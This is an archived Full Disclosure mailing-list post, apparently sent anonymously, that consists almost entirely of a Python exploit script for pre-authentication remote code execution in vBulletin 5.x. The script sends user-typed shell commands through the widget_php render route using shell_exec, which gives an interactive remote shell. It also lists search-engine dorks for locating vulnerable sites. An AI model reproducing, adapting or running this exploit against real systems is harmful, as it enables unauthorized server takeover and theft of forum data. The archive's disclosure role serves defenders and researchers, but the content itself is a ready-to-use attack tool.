[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] vBulletin 5.x 0day pre-auth RCE exploit
From: i0su9z+32fpome4pivgiwtzjw--- via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2019-09-23 23:05:55
Message-ID: 79ae60c3a78db5821f68707638e9d5976186 () guerrillamail ! com
[Download RAW message or body]
#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"
import requests
import sys
if len(sys.argv) != 2:
sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))
----
Sent using Guerrillamail.com
Block or report abuse: https://www.guerrillamail.com//abuse/?a=R1R4CQkJULcZhx2h4ns%2FYRHEQcODxsQeyLZF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic